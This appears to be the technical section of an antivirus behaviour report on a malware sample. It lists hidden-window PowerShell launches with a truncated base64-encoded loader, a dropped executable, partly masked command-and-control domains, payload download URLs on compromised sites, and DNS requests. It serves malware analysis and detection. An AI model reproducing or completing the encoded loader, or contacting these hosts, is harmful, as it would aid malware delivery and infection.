Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAFUAYwA0AEEAQQBBAFEAQQBRAD0AJwBJAG8AQQBYAEQAQgBaADEAQQAnADsAJABFAFEAdwB3AEIANABrADQAQQBBAGMARwAgAD...
- %HOMEPATH%\755.exe
- %HOMEPATH%\755.exe
- 'ds##n.com':80
- 'mo######radio38grados.com':443
- 'di####lvriksh.com':80
- http://ds##n.com/wp-content/plugins/ku799fw5/
- http://di####lvriksh.com/database/g31259/
- http://www.di####lvriksh.com/database/g31259/
- http://www.di####lvriksh.com/
- DNS ASK ds##n.com
- DNS ASK ke##ryn.com
- DNS ASK mo######radio38grados.com
- DNS ASK di####lvriksh.com
- DNS ASK nc######ve-broadcast.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAFUAYwA0AEEAQQBBAFEAQQBRAD0AJwBJAG8AQQBYAEQAQgBaADEAQQAnADsAJABFAFEAdwB3AEIANABrADQAQQBBAGMARwAgAD...' (со скрытым окном)